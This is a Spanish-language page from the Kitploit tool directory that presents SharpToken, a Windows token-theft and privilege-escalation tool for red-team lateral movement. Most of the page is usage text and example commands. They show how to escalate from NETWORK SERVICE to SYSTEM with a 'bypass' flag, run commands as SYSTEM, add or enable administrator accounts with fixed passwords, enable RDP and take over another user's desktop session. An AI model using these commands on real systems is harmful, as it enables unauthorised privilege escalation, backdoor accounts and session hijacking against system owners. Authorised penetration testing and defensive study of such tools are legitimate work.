Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SharpToken — Herramienta de robo de tokens y escalación de privilegios de Windows que roba tokens filtrados de procesos, permite acceso a nivel de SYSTEM, suplantación de usuarios y cambio de escritorio sin contraseñas. | Kitploit
Herramientas/GitHubGitHub/beichendream/sharptoken
Escalada de PrivilegiosMovimiento LateralPost-ExplotaciónRed Teaming
GitHubbeichendream/sharptoken

SharpToken

Herramienta de robo de tokens y escalación de privilegios de Windows que roba tokens filtrados de procesos, permite acceso a nivel de SYSTEM, suplantación de usuarios y cambio de escritorio sin contraseñas.

Ver Repositorio
4966815hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SharpToken

Durante el movimiento lateral del equipo rojo, a menudo necesitamos robar los permisos de otros usuarios. Bajo la defensa de un EDR moderno, nos resulta difícil usar Mimikatz para obtener otros permisos de usuario, y si el usuario objetivo no tiene ningún proceso activo, no tenemos forma de usar "OpenProcessToken" para robar Token.

SharpToken es una herramienta para explotar fugas de Token. Puede encontrar Tokens filtrados de todos los procesos del sistema y usarlos. Si eres un usuario de servicio con pocos privilegios, incluso puedes usarlo para ascender a privilegios "NT AUTHORITY\SYSTEM", y puedes cambiar al escritorio del usuario objetivo para hacer más cosas sin la contraseña del usuario objetivo. ..

image

Uso

root@kitploit:~
SharpToken By BeichenDream
=========================================================

Github : https://github.com/BeichenDream/SharpToken

If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass


Usage:

SharpToken COMMAND arguments



COMMANDS:

        list_token [process pid]        [bypass]

        list_all_token [process pid] [bypass]

        add_user    <username> <password> [group] [domain] [bypass]

        enableUser <username> <NewPassword> [NewGroup] [bypass]

        delete_user <username> [domain] [bypass]

        execute <tokenUser> <commandLine> [Interactive] [bypass]

        enableRDP [bypass]

        tscon <targetSessionId> [sourceSessionId] [bypass]


example:
    SharpToken list_token
    SharpToken list_token bypass
    SharpToken list_token 6543
    SharpToken add_user admin Abcd1234! Administrators
    SharpToken enableUser Guest Abcd1234! Administrators
    SharpToken delete_user admin
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
    SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
    SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
    SharpToken tscon 1




Permisos Elevados

Además de la mejora habitual de privilegios mediante robo de Token, SharpToken también soporta la obtención de Tokens con integridad a través de Bypass

Si eres un usuario NT AUTHORITY/NETWORK SERVICE y agregas el parámetro bypass, SharpToken robará System de RPCSS, es decir, NT AUTHORITY\NETWORK SERVICE a NT AUTHORITY\SYSTEM incondicionalmente

image

ListToken

La información enumerada incluye SID, LogonDomain, UserName, Session, LogonType, TokenType, TokenHandle (identificador del Token después de Duplicar), TargetProcessId (proceso del que se origina el Token), TargetProcessToken (identificador del Token en el proceso de origen), Groups (grupo en el que se encuentra el usuario del Token)

root@kitploit:~
SharpToken list_token

image

Enumerar Tokens desde el proceso especificado

root@kitploit:~
SharpToken list_token 468

image

Obtener un shell interactivo

root@kitploit:~
execute "NT AUTHORITY\SYSTEM" cmd true

image

Obtener resultados de ejecución de comandos (ejecutado bajo webshell)

root@kitploit:~
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"

image

Crear un usuario administrador con el token robado

root@kitploit:~

SharpToken add_user admin Abcd1234! Administrators

Habilitar un usuario administrador con el token robado

root@kitploit:~
    SharpToken enableUser Guest Abcd1234! Administrators

Eliminar un usuario con un Token robado

root@kitploit:~
    SharpToken delete_user admin

Usar el Token robado para cambiar al escritorio del objetivo

Donde 1 es el escritorio del usuario objetivo y 2 es el escritorio que queremos recibir

root@kitploit:~
    SharpToken tscon 1 2

LICENCIA

GNU General Public License

Referencias

https://www.tiraniddo.dev/2020/04/sharing-logon-session-little-too-much.html

https://github.com/decoder-it/NetworkServiceExploit

https://github.com/FSecureLABS/incognito

https://github.com/chroblert/JCTokenUtil

Descargar herramienta